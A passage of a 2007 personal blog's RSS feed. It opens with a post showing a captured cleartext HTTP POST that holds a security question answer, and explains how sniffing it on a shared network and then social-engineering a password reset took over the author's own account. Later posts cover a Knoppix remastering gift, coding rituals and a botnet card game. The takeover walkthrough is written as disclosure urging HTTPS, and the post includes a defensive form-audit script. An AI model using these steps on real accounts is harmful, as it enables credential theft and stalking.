0030  16 d0 db 58 00 00 43 6f 6e 74 65 6e 74 2d 54 79   ...X..Content-Ty<br />
0040  70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f   pe: application/<br />
0050  78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e   x-www-form-urlen<br />
0060  63 6f 64 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c   coded..Content-L<br />
0070  65 6e 67 74 68 3a 20 31 33 34 0d 0a 0d 0a 70 6f   ength: 134....po<br />
0080  73 74 5f 66 6f 72 6d 5f 69 64 3d 66 66 66 66 66    st_form_id=fffff<br />
0090  66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66   ffffffffffffffff<br />
00a0  66 66 66 66 66 66 66 66 66 66 66 26 73 65 74 74   fffffffffff&sett<br />
00b0  69 6e 67 73 3d 26 73 61 76 65 5f 73 65 63 71 3d   ings=&save_secq=<br />
00c0  31 26 71 75 65 73 74 69 6f 6e 3d 32 26 61 6e 73   1&question=2&ans<br />
00d0  77 65 72 3d 63 75 74 65 2b 67 69 72 6c 26 73 61   wer=cute+girl&sa<br />
00e0  76 65 5f 71 75 65 73 74 69 6f 6e 3d 43 68 61 6e   ve_question=Chan<br />
00f0  67 65 2b 53 65 63 75 72 69 74 79 2b 51 75 65 73   ge+Security+Ques<br />
0100  74 69 6f 6e                                                               tion</em></p>
<p>For those that have no clue what's going on in the above, this is an HTTP POST frame that is passing a few variables. Random crap we don't care about, then post_form_id (my guess is some form of checksum to make sure it's me), and then some things to save. The ones we're interested in are:</p>
<blockquote><p>question=2<br />
answer=cute+girl</p></blockquote>
<p>This means set Question two (which dealt with kissing?) to the answer of "cute girl" (yea, she was pretty cute, geeks know how to pick 'em). I'd like to take this time to point out that that post_form_id is unique to my account. I logged on on two different systems, and got the same one every time. Now, you're saying "But the account isn't passed in the clear! So this means nothing! Noob!!" </p>
<p>Haha, but unfortunately this site passes the account name in the clear. The full packet also included a line consisting of:</p>
<p><em>login={username}@{domain}.{TLD}...user={usernum}</em></p>
<p>I've removed the actual hexdump as it gave away way too much information about what site this is.</p>
<p>Please take a minute to note the user name. It is in clear, plain text. If you read the entire disassembled packet, that means the username, and security question are sent in plain text and together. SCARY. Also fun things to notice, you can read my cookies in there. Sure, they're (hopefully) encrypted, but still I'd really like to try a replay attack on here. I'm willing to bet by next week they'll have made sure there's a time stamp encoded somewhere in that junk. That last field is the user you're tracked by on this site. Take that value, and plug it into the profile page of this site, and you're taken to this other person's profile page. So, this is also a great way to meet random people, or friend them if they're sitting next to you for that ultimate stalker feel. </p>
<p><strong>The Attack</strong><br />
Now, we'll perform an attack (on myself). I logged in on my desktop, while running Ethereal from a laptop on the same hub. I then traversed to the account page, and finally set up my security question (shh.... it's a secret). Checked through my Ethereal dump, found the two packets I cared about, and stole some values. Among them the target's account name, and security question/answer. Then I opened up an email (from an account completely unrelated to the registered account email), prepared a little message asking to reset my password, and "identifying myself" with the stolen Q&A, hit send, and waited.</p>
<p>Two days later I got a response, they had reset my password. I used a little social engineering in the emails, but any good hacker would be able to do the same. This is completely non-malicious as it's my own account and I owned both email accounts involved, and I wanted to change my password anyways. So just obtaining a user's security question can give attackers access to a certain account.</p>
<p><strong>Practicality</strong><br />
Sure, you say, this attack is possible, but how practical is it? I'll give you that this isn't going to compromise the entirety of ANY site (although through a good phishing scam and ARP poisoning someone could get a nice chunk of a campus or office at once) but it is a vulnerability. And now that some social networking sites are tracking credit cards for various reasons, they have a duty to secure their sites as much as possible. Now, these sites are smart and only show the last four of the credit card number, like any business, but I can now use that credit card to order things off the site. Granted, that's just a little stupid attack, but this does give up at least partial credit card data, including expiration data and name and this should NOT be accepted by the public. We must hold financial institutions, and any place that deals with personal information to a higher standard, require HTTPS.</p>
<p><strong>Conclusions</strong><br />
So, this whole incident begs just one question. Why NOT use https://? It requires no additional coding, you're just going over a secure channel. The user doesn't have to type in the s, you can just meta refresh them to that domain. And since you need https to be able to login, you know all your users support it. It's downright stupid, and begging to be hacked to be this large, and not use it. Same goes for any bank that follows the same principles, and brokerages. Heck it seems like every site that would naturally want encryption shrugs it off, and opts instead for plain ol' http://. Please guys, think of your users, and secure your stuff.</p>
<p>I've tried to be really good in this post about removing any information concerning which site it is. Please don't post comments that contain the site in question, as they will be modified and/or deleted. I bear no malice towards that site, and I hope they accept this threat as genuine and secure their site ASAP. I will be passing this on to their admins once I post it, with more detailed information, for them to act upon. I'd hope the site will show me leniency, and recognize my intentions are to use this as a warning for all websites in their position.</p>
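<p>A site owner can check their own pages for the two problems described in this post. The script below is an added example, not code from the original post or from the site in question: it flags any form carrying a password or security answer that is either submitted over http:// or merely served from an http:// page (where the form action can be rewritten in transit). The host site.example and the page markup are constructed; the field names post_form_id, save_secq, question and answer are the ones visible in the capture above.</p>

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Field names treated as secrets. "answer" is the security-answer field from the
# capture in the post; the password names are assumed common conventions.
SENSITIVE_NAMES = {"pass", "passwd", "password", "answer"}


class FormCollector(HTMLParser):
    """Collects every form on a page with its action and (name, type) fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            name = (a.get("name") or "").lower()
            ftype = (a.get("type") or "text").lower()
            self._current["fields"].append((name, ftype))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def is_sensitive(form):
    """A form is sensitive if it has a password input or a known secret field."""
    return any(t == "password" or n in SENSITIVE_NAMES for n, t in form["fields"])


def audit_page(page_url, html):
    """Return (resolved_action, issue) pairs for sensitive forms on one page.

    cleartext-submit: the secret itself crosses the network unencrypted.
    insecure-origin:  the page holding the form arrived over http, so the
                      form (including its action) can be altered in transit
                      even when the action points at https.
    """
    collector = FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        if not is_sensitive(form):
            continue
        # An empty or relative action resolves against the page's own URL.
        action = urljoin(page_url, form["action"])
        if urlsplit(action).scheme != "https":
            findings.append((action, "cleartext-submit"))
        if urlsplit(page_url).scheme != "https":
            findings.append((action, "insecure-origin"))
    return findings


# Constructed sample: login form served over http, posting to https.
LOGIN_PAGE = """
<form method="post" action="https://login.site.example/login.php">
  <input type="text" name="email" />
  <input type="password" name="pass" />
</form>
<form method="get" action="/search.php"><input type="text" name="q" /></form>
"""

# Constructed sample: security-question form posting back to its own http page.
ACCOUNT_PAGE = """
<form method="post" action="editaccount.php">
  <input type="hidden" name="post_form_id" value="ffff" />
  <input type="hidden" name="save_secq" value="1" />
  <select name="question"><option value="2">Question two</option></select>
  <input type="text" name="answer" />
</form>
"""

if __name__ == "__main__":
    pages = [
        ("http://site.example/index.php", LOGIN_PAGE),
        ("http://site.example/editaccount.php", ACCOUNT_PAGE),
        ("https://site.example/index.php", LOGIN_PAGE),
    ]
    for url, html in pages:
        issues = audit_page(url, html)
        print(url, issues if issues else "ok")
```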
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2007/02/13/plain-text-passwords/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Linux LoveCD</title>
		<link>http://thesnarky.com/2007/02/12/linux-lovecd-second-try/</link>
		<comments>http://thesnarky.com/2007/02/12/linux-lovecd-second-try/#comments</comments>
		<pubDate>Mon, 12 Feb 2007 22:13:58 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Interests]]></category>
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://thesnarky.com/archives/134</guid>
		<description><![CDATA[Last year I had a fairly, bleh, Valentine's day post. It was rushed, poorly done, and all over the place. This year, this year is different. You may notice that this is BEFORE Valentine's day... that's true. I'm putting this out early, with the same hopes as last year, that some geek out there might score a date for the rest of us! Now, my plan this year, is a personalized Linux LiveCD that I'm calling the LoveCD. So, this post is going to be 10 fun ways to personalize a CD for that special someone (or laptop, in my case).]]></description>
			<content:encoded><![CDATA[<p>Last year I had a fairly, bleh, Valentine's day post. It was rushed, poorly done, and all over the place. This year, this year is different. You may notice that this is BEFORE Valentine's day... that's true. I'm putting this out early, with the same hopes as last year, that some geek out there might score a date for the rest of us! Now, my plan this year, is a personalized Linux LiveCD that I'm calling the LoveCD. So, this post is going to be 10 fun ways to personalize a CD for that special someone (or laptop, in my case).<br />
<span id="more-134"></span></p>
<p><strong>Requirements</strong><br />
You're going to need the following:</p>
<ol>
<li><a href="http://knoppix.org">Knoppix Live CD</a>. I'm using the most current as of this writing, 5.0.1.</li>
<li>A nice sized directory (/home/snarky/data/programming/knoppix in my case) to do the editing on. At least 3 GB free.</li>
<li>1 GB of RAM, if you don't have enough RAM, make a GB of swap space.</li>
<li>A sense of comfort with the Linux operating system, and all that goes into it (especially command line stuff). If you don't feel you can do part of this guide, don't bork your system, just pay me to make it for you.</li>
</ol>
<p><strong>Disclaimer(s)</strong><br />
I'm also kind of weird in the head, one might say, and like to continue long metaphors. So, throughout this article, I won't say "girlfriend", I'll use a computer term. It'll be in italics because otherwise this guide would get even more confusing!</p>
<p>This is my third try at this guide, the first two... didn't work as well as I'd like, so that's why I'm just telling you where to find the certain files you'll want to edit.</p>
<p><strong>Setup</strong><br />
In order to edit this cd for your <em>most significant bit</em>, you'll need to get a good image on your hard drive. I recommend this guide from <a href="http://knoppix.net/wiki/Knoppix_Remastering_Howto">Knoppix.net</a>. Once you get the compressed file system and all boot-necessary files into directories on your machine, then you can play around with editing the files.</p>
<p><strong>The Editing</strong></p>
<ol>
<li>First off, is the background. While I love advertising for Knoppix, <em>my two's complement</em> deserves to look at a better picture. Pick something of the two of you, or maybe a nice sappy heart, or <a href="http://xkcd.com/c162.html">something more romantic</a>. By default this lives in /usr/local/lib/knoppix.gif. I think you know what to do here, that's right, overwrite that file with your sweet picture! This should be 1024x768, if you can at all manage it, as I didn't find out if the picture will be stretched, centered, or what.</li>
<li>Next I had a great idea for the start up sound. Since this'll be the first impression of the custom LoveCD for your <em>int main()</em>, you want it to be something special to them. Yea, you'll have to hear it when you test the disc, but that's no excuse to give her a CD that boots up to a loud rendition of Weird Al's White & Nerdy. Actually, that's a great song, so maybe use that, but I digress.
<p>This file is stored in /usr/share/sounds/startup.ogg (or .wav). If .ogg is there, that will be played, otherwise the wav will be. If you want to change the type of file, all the config of X is in /etc/X11/Xsession.d/45xsession. This is a nice big file, so I'll tell you if you're using my version of Knoppix it's line 104, otherwise grep for a function called "playsound()". If you don't know shell scripting, don't try to edit this file, it's huge and nasty, you've been warned. So, again just overwrite the original ogg file with one of your choosing. </li>
<li>The low-res ASCII art that shows during boot can be changed also. This lives in the boot.img in the /boot/isolinux/ directory, and you'll have to mount that compressed directory in order to get at a file called logo.16. Put a GIF 640x400 image in there, and use the giftopnm command to get a .ppm file. From there you'll use ppmtolss16 to make a .16 file that will be able to be shown on boot. Since this is really *Not* good quality, it might be best to go with something black and white, and obvious even at low res.</li>
<li>Also in that directory is /boot/isolinux/boot.msg. This is the boot message, along with some other stuff. DO NOT change the other stuff, bad things happen, but you can make the boot message be any single line of text you like. If you and your <em>eliza</em> have an inside joke, here's a great place to put it.</li>
<li>Another fun thing I found is that index.html file you copied over to the master directory. This is displayed in a browser upon boot, so it's the perfect place to leave some special cryptographically signed message for the <em>enigma</em> in your life. Just open that file in vi, or any editor you prefer, and edit to your heart's content. I threw in a nice little personal message, and thought about recording a video message if I had a webcam. Could put a file:// link on the opening index.html to have them watch you say sweet things.</li>
<li>If your <em>primary hard drive</em> has a specific profession you want to tailor the disc to, go ahead. If you chroot into the directory you're editing in, you can use apt-get (and an internet connection) to change what software is installed. The person I'd make it for would appreciate a bunch of the different games, but not the hacking utilities, so I'd make that change. Also, one can edit a program's settings to make things easier. For instance, I'd put their login information into GAIM (username only, no password) so that it's real easy for them to jump on and say what an amazing job I did *evil grin*.</li>
<li>Along the same lines, one can change individual user options by copying the skel user out of /etc, making it into a /home/knoppix directory, and chowning it to knoppix. Now you can change the .bash_profile, and everything that goes into having your own user. Personally, since I love easter eggs, I'd make their name into a command pointing to a script I made that spits out a random compliment: "$name is {array of compliments}". I learned long ago that random compliments just make your day, even if you give it to yourself. Let them stumble across this little tidbit, or tell them yourself.</li>
<li>One can edit the programs that start on logon, as with any machine. Currently it just launches Mozilla on index.html, but me I'd like to make some little widget type app that will mean something to them. That's vague, but an idea might be popping up a window that rotates through pictures stored on the hard drive, a nice photo album viewer for good memories. Or (and this is more up my alley), pop up bitchX IRC set to log onto a certain server and channel. On this channel you have a bot that'll pass on some kind words just in case you're not there. "Hey $name, has anyone told you you're beautiful today?" "How are you this fine day, gorgeous?" Etc. That way they don't have to be at all technically competent to enjoy the surprise, and it'll happen every time they boot.</li>
<li>I'm all about the command line, and think any Linux fan should know how to use it. So you can bet I customize my console colors and fonts, since I spend a ton of time in it. Why not do the same for your <em>mainframe</em>? If they have a favorite color (as all do) design a color scheme around that color to make things feel more like home. Obviously if they're not a coder or Linux nut already, this might go unnoticed. The file you're looking for is in /home/knoppix/.kde/share/config/konsolerc if you made the new user. Or you can use the trick of using chroot and your current X session to load Konsole, and setup the values yourself. Personally, I'm a fan of gnome-terminal, so I'd try to put that in instead, and throw a nice background image of a sunset on it.</li>
<li>One of my favorite scripts is a little one I use to change my desktop. I just put a line in crontab calling a certain Python script, and every hour on the fifteen my background is changed to another picture from a certain directory. This can be perfect for a nice directory of a good handful of your most meaningful pictures: prom, wedding, the day your first server came home from the rack, whatever. If you've chrooted the filesystem, you can edit the crontab for your new knoppix user. Among other things you could tack onto here, I'd recommend a nice background changing script to make this disc change a little and keep them wanting to stay booted into it, rather than windows.</li>
<li>And just because I like going the extra mile, the 11th change I'd make is going into the ~knoppix/.mozilla/firefox/{profile}/ directory, and making a bookmarks file. Give her a nice selection of her favorite You Tube videos, Flash games, and news sites right at her fingers. Oh, and if you're smart, also a link to your blog and photo site, just to get her comments.</li>
</ol>
<p><strong>The BURNING!</strong><br />
Now follow your favorite guide for how to make the ISO, and finally burn it, and you're done!</p>
<p><strong>Final Thoughts</strong><br />
While this is really just a "haha, look how cute I can be" I thought that this might be a good gift from someone whose job takes them far away from home for a while. Now, they may not have access to the required devices, but a company could make these CDs at a small fee for two purposes. The first is it'll spread Linux, always a good thing, and the second is it gives one of the people in the relationship a nice, and usable, gift. One thought might be for soldiers stationed in God knows where who could use this as a sort of bootable photo album. Set up an FTP server to let them upload images for background, a video message for their family, and other assorted specific changes. Then it'd be as easy as copying over the base filesystem, overwriting a few, select files, and burning to CD. It could (probably) be automated. I'd actually, *really* like to try to get this up and running if I had the time. Heck, I'd be willing to do it for free, and just have a PayPal "donate if you like" link on the page to cover the small cost of CDs bought in bulk and (mainly) shipping. If anyone would be interested in helping me with this, drop me a line: snarky{at}thesnarky{dot}com.</p>
<p>Bet you didn't think I could keep the computer term as a girlfriend metaphor up, did ya? It's one I've used for a long time, so practice makes perfect, I suppose. I'm single, so don't get to find out just how romantic such a CD is, but if anyone has the guts to give this in a box of chocolates, PLEASE let me know!</p>
<p>If your little <em>love array</em> has never remastered a CD, they might not truly appreciate the hours and frustration spent doing this. It was a lot harder than I initially thought, though that may be because I was using a different version of Knoppix than I thought it was. However, I found a couple of guides to editing Knoppix CDs online, and the best (that I ended up using my first time) was from <a href="http://www.stirnimann.com/mystuff/doc/knoppix.txt">here</a>. For a different distro, look at <a href="http://os.newsforge.com/os/05/06/09/1619246.shtml">this Slax guide</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2007/02/12/linux-lovecd-second-try/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Coding as&#8230; a religion?!</title>
		<link>http://thesnarky.com/2007/01/19/coding-as-a-religion/</link>
		<comments>http://thesnarky.com/2007/01/19/coding-as-a-religion/#comments</comments>
		<pubDate>Fri, 19 Jan 2007 06:12:14 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Interests]]></category>
		<category><![CDATA[Programming]]></category>

		<guid isPermaLink="false">http://thesnarky.com/archives/122</guid>
		<description><![CDATA[So there I was.... sitting in "Popular Religion and Cyberspace" minding my own darn business when BAM, professor assigns a paper! Uncool... What did the paper have to be on? A form  of folk, popular, or vernacular religion that we'd experienced. That was the entire assignment description. Right quick I'll tell you that these are folklore terms for religions that: differ from a formal religion slightly; are of a repressed group; or the personal beliefs of people and how they perceive religion, respectively. 

Now I had an initial idea to write about the religion found in <a href="http://mud.simud.org">Walraven</a>, but after talking with the creator for a bit, decided this wasn't gonna work. So, the other guys on the IRC channel (developers of walraven / friends of them) started throwing out other ideas related to coding, and I took them and ran with it. Here's what I came up with:]]></description>
			<content:encoded><![CDATA[<p>So there I was.... sitting in "Popular Religion and Cyberspace" minding my own darn business when BAM, professor assigns a paper! Uncool... What did the paper have to be on? A form  of folk, popular, or vernacular religion that we'd experienced. That was the entire assignment description. Right quick I'll tell you that these are folklore terms for religions that: differ from a formal religion slightly; are of a repressed group; or the personal beliefs of people and how they perceive religion, respectively. </p>
<p>Now I had an initial idea to write about the religion found in <a href="http://mud.simud.org">Walraven</a>, but after talking with the creator for a bit, decided this wasn't gonna work. So, the other guys on the IRC channel (developers of walraven / friends of them) started throwing out other ideas related to coding, and I took them and ran with it. Here's what I came up with:<br />
<span id="more-122"></span><br />
Basically a central part of a hacker's mindset (those that program) is to come up with the most elegant solution for a problem. This may not be the most obvious choice... for instance Carmack (one of the developers behind Quake) has this <a href="http://www.beyond3d.com/articles/fastinvsqrt/">beauty</a>. It calculates the 1/sqrt(x)... quite fast. In this singlemindedness for elegant code, some coders have various rituals they follow. While most are joking, or just not ritualistic (such as only coding with certain music, or environments), I do know some that take a religious feel. I actually surprised myself by realizing some of my practices classify as religions according to folklore definitions. For instance, jokingly, when I get stuck on code, one of the things I do to prevent myself from breaking stuff is to turn out whatever lights I can, remove my shirt, and draw "Imbued Symbols" on my chest... What do I mean by that? Basically... anything dealing with the language I'm using... Lambdas for scheme, ones, zeros, reg expressions, whatever. It's really joking, but for some reason it helps to focus my mind on the code.</p>
<p>I've even been on coding binges (worst was 20 hours straight after a bad time in my life) where I lose consciousness of the environment around me. My roommate's talked to me in this state before, and I have no knowledge of the conversation. I've, apparently, cursed people up and down in this state, people I'd never curse at, and didn't remember a thing until they confronted me about it. This is called a "heightened state of awareness" with regard to something, in this case code, and nothing else. I know of other programmers who've been sucked in enough by the code to not notice the passage of time, or people talking to them, so I know I'm not just a freak. </p>
<p>Anyways, the professor of this class took 15 minutes today for me to discuss with the class my theory (that this constitutes a vernacular religion... how each person deals with code) and they were very receptive. In fact, the teacher gave me full credit on the paper, and said that while he wasn't sure he'd buy it when he picked up the paper, he now is fully convinced that at least a very persuasive argument (and that I made a very persuasive one) could be made to that effect, and the rest of the class agreed this could be viewed as a vernacular religion.</p>
<p>Interesting... could I have just coined a new religion without intending to?</p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2007/01/19/coding-as-a-religion/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Botnet &#8211; Not just the Bane of Mankind!</title>
		<link>http://thesnarky.com/2007/01/08/botnet-not-just-the-bane-of-mankind/</link>
		<comments>http://thesnarky.com/2007/01/08/botnet-not-just-the-bane-of-mankind/#comments</comments>
		<pubDate>Tue, 09 Jan 2007 04:35:10 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Botnet]]></category>
		<category><![CDATA[Games]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Interests]]></category>

		<guid isPermaLink="false">http://thesnarky.com/archives/113</guid>
		<description><![CDATA[So, everyone in this age has heard of the "eeeeeviiiil botnets", yes? They're shown all over the media threatening our livelihoods, they're written about in the newspapers, and it's obvious the world is going to end tomorrow due to these little buggers. Or is it? I for one am quite intrigued by botnets, and the viruses (I was formally corrected this weekend that viruses is the "correct" plural, so there ya go) that form them. In many ways these evil little guys are the best coding we see nowadays when OSes are.... abysmal to say the least. Now, of course I'm not intrigued enough to MAKE a botnet in the wild... that'd be evil and wrong, and obviously I'd be anti-freedom. But I'd still like to play with them, and to that end, I unveil the game Malap and I were working on this weekend.

<a href="http://botnet.threeplanetssoftware.com/botnet">Botnet</a>!
]]></description>
			<content:encoded><![CDATA[<p>So, everyone in this age has heard of the "eeeeeviiiil botnets", yes? They're shown all over the media threatening our livelihoods, they're written about in the newspapers, and it's obvious the world is going to end tomorrow due to these little buggers. Or is it? I for one am quite intrigued by botnets, and the viruses (I was formally corrected this weekend that viruses is the "correct" plural, so there ya go) that form them. In many ways these evil little guys are the best coding we see nowadays when OSes are.... abysmal to say the least. Now, of course I'm not intrigued enough to MAKE a botnet in the wild... that'd be evil and wrong, and obviously I'd be anti-freedom. But I'd still like to play with them, and to that end, I unveil the game <a href="http://nearbygamers.com">Harkins</a> and I were working on this weekend.</p>
<p><a href="http://botnet.threeplanetssoftware.com/botnet">Botnet</a>!</p>
<p>Now, that website is nothing more than a placeholder so y'all don't browse my site... it'll get better I promise, as this game'll be advertised entirely online. Hopefully I can convince the God of CSS (Harkins) to bang out something flashy. </p>
<p>Basically the premise is that you are an upstart botnet mastermind. Your computer might not be the best, and your viruses a tad unstealthy (at first) but you want to make your mark on the world. You move through a "network" of system cards trying to complete missions, or destroy your opponent. It's different from other card games, with some influences showing through. Gameplay is not nailed down yet. So that's all I'll say for now.</p>
<p>One goal we are looking for, however, is to make it somewhat realistic. For instance: the cards all are real-life things, different OSes, ways a cracker might hack something, etc. We don't want to make something that'll just further the fear of teenage punks in dark basements sipping Jolt. Also, we want this to be simple... our first version might have been too simple.</p>
<p><a href="http://botnet.threeplanetssoftware.com/downloads/botnetrules_v1.pdf">Rules version 1</a> - </p>
<ul>
<li>For this version we did combat as follows: At the end of a turn, whichever side had more viruses on a system won it, and the others were removed. This proved to be a bit... weird... due to modifiers and deciding who was attacking whom. This has been scrapped.</li>
<li>We did movement by having a limit to how many different viruses one can move, and how far they can move through the network. This slowed things down in the beginning, and is being reworked.</li>
<li>Income was kept over turn endings, and couldn't be spent quickly enough due to a small hand limit. This is definitely changing in a few ways, as we'll probably make you clear your income every turn, among other things.</li>
<li>All in all, it was a tad fun, and should be loads more once the game's sped up a bit, and you actually have to make decisions about spending money or saving it.</li>
</ul>
<p>Those're my brief and very disorganized (still banging on xorg from my previous post) thoughts on the first system we play tested. Harkins, if you think of anything you'd like to add, feel free.</p>
<p>Current rules will be kept at: <a href="http://botnet.threeplanetssoftware.com/botnet/rules/botnetrules.pdf">Here</a><br />
Cards can be viewed and printed at: <a href="http://botnet.threeplanetssoftware.com/botnet/deck.php?id=1">Here</a><br />
Forums are: <a href="http://threeplanetssoftware.com/forums/index.php?board=3.0">Here</a></p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2007/01/08/botnet-not-just-the-bane-of-mankind/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

